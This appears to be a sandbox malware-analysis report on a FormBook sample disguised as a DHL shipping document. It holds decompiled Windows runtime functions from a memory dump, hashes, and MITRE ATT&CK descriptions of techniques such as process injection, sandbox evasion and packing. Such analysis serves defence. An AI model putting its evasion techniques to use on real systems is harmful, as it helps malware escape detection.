API String ID: 885266447-871070163
Opcode ID: abaa5104081650462383e7e73352a5f2e414a62c42b88258509832b3f6dde008
Instruction ID: caad33c801e1d35225d6e7bf40629e50773284d44566f91ff9f28ad0225c9437
Opcode Fuzzy Hash: abaa5104081650462383e7e73352a5f2e414a62c42b88258509832b3f6dde008
Instruction Fuzzy Hash: F451E5716407126EEF159F38CCC0FEA77A9AF48324F114629FD15DB280EB71E8859BA0

Uniqueness

Uniqueness Score: -1.00%

Function 020EEC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E020EEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E020DDA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x21a793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E020C16C0(_t39);
				} else {
					_t40 = E020BF9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E02103915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E020C01A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x21a793c; // 0x0
								_push(_t85);
								_t44 = E020C1F28(_t71);
							} else {
								_t44 = E020BF8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E02103915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E02142306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E020EEC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E02104FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E02113F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E02113F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x21a20c0;
								if(_t85 != 0x21a20c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E0214217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E02113F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

0x020eec56
0x020eec56
0x020eec56
0x020eec5c
0x020eec64
0x021223e6
0x021223eb
0x021223eb
0x020eec6a
0x020eec6c
0x020eec6f
0x021223f3
0x021223f8
0x021223fa
0x021223fc
0x020eec75
0x020eec76
0x020eec76
0x020eec7b
0x020eec7c
0x020eec7e
0x02122406
0x02122407
0x0212240c
0x0212240d
0x0212240d
0x0212240d
0x02122414
0x02122417
0x0212241e
0x02122435
0x02122438
0x0212243c
0x0212243f
0x02122442
0x02122443
0x02122446
0x02122449
0x02122453
0x02122455
0x0212245b
0x0212245b
0x020eeb99
0x020eeb99
0x020eeb9c
0x020eeb9d
0x020eeb9f
0x020eeba2
0x02122465
0x0212246b
0x0212246d
0x020eeba8
0x020eeba9
0x020eeba9
0x020eebae
0x020eebb3
0x020eebb9
0x020eebbb
0x02122513
0x02122514
0x02122519
0x0212251b
0x020eec2a
0x020eec2d
0x020eec33
0x020eec36
0x020eec3a
0x020eec3e
0x020eec40
0x020eec47
0x020eec47
0x020eec40
0x020c22c6
0x020eebc1
0x020eebc1
0x020eebc5
0x020eec9a
0x020eec9a
0x020eebd6
0x020eebd6
0x00000000
0x020eebbb
0x02122477
0x0212247c
0x02122486
0x0212248b
0x02122496
0x0212249b
0x0212249d
0x021224a0
0x021224a3
0x021224aa
0x021224aa
0x021224a5
0x021224a5
0x021224a5
0x021224ac
0x021224af
0x021224b0
0x021224b3
0x021224b9
0x021224ba
0x021224bb
0x021224c6
0x021224cb
0x021224cd
0x021224d0
0x021224d1
0x021224d4
0x021224d6
0x021224d9
0x021224d9
0x021224dc
0x021224df
0x021224e1
0x021224e7
0x021224e9
0x021224ec
0x021224ef
0x021224f2
0x021224f2
0x021224ef
0x021224e7
0x021224fa
0x021224ff
0x02122501
0x02122503
0x02122506
0x0212250b
0x020eeb8c
0x020eeb93
0x00000000
0x00000000
0x020eeb93
0x00000000
0x020eeb99
0x020eec85
0x020eec85
0x020eec85
0x00000000

Strings

RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 021224BD
RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0212248D
RTL: Re-Waiting, xrefs: 021224FA

Memory Dump Source

Source File: 0000000E.00000002.2369631872.00000000020B0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: true

Associated: 0000000E.00000002.2369625732.00000000020A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369749531.0000000002190000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369754981.00000000021A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369761038.00000000021A4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369765770.00000000021A7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369770391.00000000021B0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369810649.0000000002210000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-3177188983
Opcode ID: 1ac77fc38a8b43191f76356a0e27bff90b030b2f1ab213894a74c7240bb5885e
Instruction ID: 7f9306f1e7834626e5e5ced6fa3b9bd8758911f0c52aac8fc5eafcaa5e80871c
Opcode Fuzzy Hash: 1ac77fc38a8b43191f76356a0e27bff90b030b2f1ab213894a74c7240bb5885e
Instruction Fuzzy Hash: 4141C670640314AFDB24DB68CC84FAF77B9AF44720F208619F9559B2C0D734E551DB61

Uniqueness

Uniqueness Score: -1.00%

Function 020FFCC9, Relevance: 6.3, APIs: 4, Instructions: 257
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E020FFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E020FEE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E020FEE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E020F685D(_t167, 4) == 0) {
								if(E020F685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E020F685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E020F685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E020D8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E020CDFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E020FEE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E020FEE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

0x020ffcd1
0x020ffcd6
0x020ffcd9
0x020ffcdc
0x020ffcdf
0x020ffce2
0x020ffce5
0x020ffce8
0x020ffceb
0x020ffced
0x020ffced
0x020ffcf3
0x00000000
0x00000000
0x020ffcfc
0x020ffcfe
0x020ffdc1
0x0212ecbd
0x00000000
0x0212eccc
0x0212eccc
0x0212ecd2
0x00000000
0x00000000
0x0212ecdf
0x0212ece0
0x0212ece4
0x0212eceb
0x0212ecee
0x0212eca8
0x0212eca8
0x0212ecaa
0x020ffd76
0x020ffd79
0x020ffdb4
0x020ffdb5
0x020ffdb6
0x00000000
0x020ffdb6
0x020ffd7e
0x0212ecfc
0x020ffe2f
0x00000000
0x020ffe2f
0x0212ed08
0x0212ed0f
0x0212ed17
0x0212ed1b
0x00000000
0x0212ed1b
0x020ffd88
0x00000000
0x00000000
0x020ffd94
0x020ffd99
0x020ffda1
0x00000000
0x00000000
0x020ffdb0
0x00000000
0x020ffdb0
0x0212ecbd
0x020ffdc7
0x020ffdcb
0x00000000
0x020ffdd7
0x020ffde3
0x020ffe06
0x02111fe7
0x00000000
0x00000000
0x02111fef
0x02111ff0
0x02111ff4
0x02111ff7
0x02111ffa
0x02111ffd
0x02112000
0x00000000
0x00000000
0x0212ecf1
0x00000000
0x0212ecf1
0x00000000
0x020ffe06
0x020ffde8
0x020ffdec
0x020ffdef
0x020ffdf2
0x00000000
0x020ffdf2
0x020ffdcb
0x020ffd04
0x020ffd05
0x0212ec67
0x00000000
0x00000000
0x0212ec6f
0x00000000
0x0212ec6f
0x020ffd13
0x020ffd3c
0x020ffd40
0x0212ec75
0x0212ec7a
0x00000000
0x0212ec8a
0x0212ec8a
0x0212ec90
0x0212ecb2
0x020ffd73
0x020ffd73
0x00000000
0x020ffd73
0x0212ec95
0x00000000
0x00000000
0x0212eca1
0x0212eca4
0x0212eca5
0x00000000
0x0212eca5
0x0212ec7a
0x020ffd4a
0x00000000
0x020ffd6e
0x020ffd6e
0x020ffd71
0x00000000
0x020ffd71
0x020ffd4a
0x020ffd21
0x0210a3a1
0x00000000
0x0210a3a1
0x020ffd36
0x0211200b
0x02112012
0x00000000
0x00000000
0x02112018
0x00000000
0x02112018
0x00000000
0x020ffd36
0x020ffe0f
0x020ffe16
0x0210a3ad
0x00000000
0x00000000
0x0210a3b3
0x0210a3b3
0x020ffe1f
0x0212ed25
0x0212ed86
0x00000000
0x00000000
0x0212ed91
0x0212ed95
0x0212ed95
0x0212ed9a
0x0212edad
0x0212edb3
0x0212edba
0x0212edc4
0x0212edc9
0x00000000
0x0212edcc
0x0212ed2a
0x0212ed55
0x00000000
0x00000000
0x0212ed61
0x0212ed66
0x0212ed6e
0x00000000
0x00000000
0x0212ed7d
0x00000000
0x0212ed7d
0x0212ed30
0x00000000
0x00000000
0x0212ed3c
0x0212ed43
0x0212ed4b
0x00000000
0x00000000
0x00000000
0x00000000

APIs

__fassign.LIBCMT ref: 020FFD94

Memory Dump Source

Source File: 0000000E.00000002.2369631872.00000000020B0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: true

Associated: 0000000E.00000002.2369625732.00000000020A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369749531.0000000002190000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369754981.00000000021A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369761038.00000000021A4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369765770.00000000021A7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369770391.00000000021B0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369810649.0000000002210000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID:
API String ID: 3965848254-0
Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction ID: 1b92bc75f6c2a2cfd465dadcaf00300f2c3bad495e1467e7fd1a6ed94b2db3a4
Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction Fuzzy Hash: 0191D231D8031AEECFA4CF98C8487EEBBB5FF40308F20806AD615A7991E7705A55DB91

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report DHL Shipping doc & Shipment tracking details.docx

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Function 00418270, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Function 004181BA, Relevance: 1.6, APIs: 1, Instructions: 71
filenativeCOMMON

Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Function 004181C0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Function 004183A0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON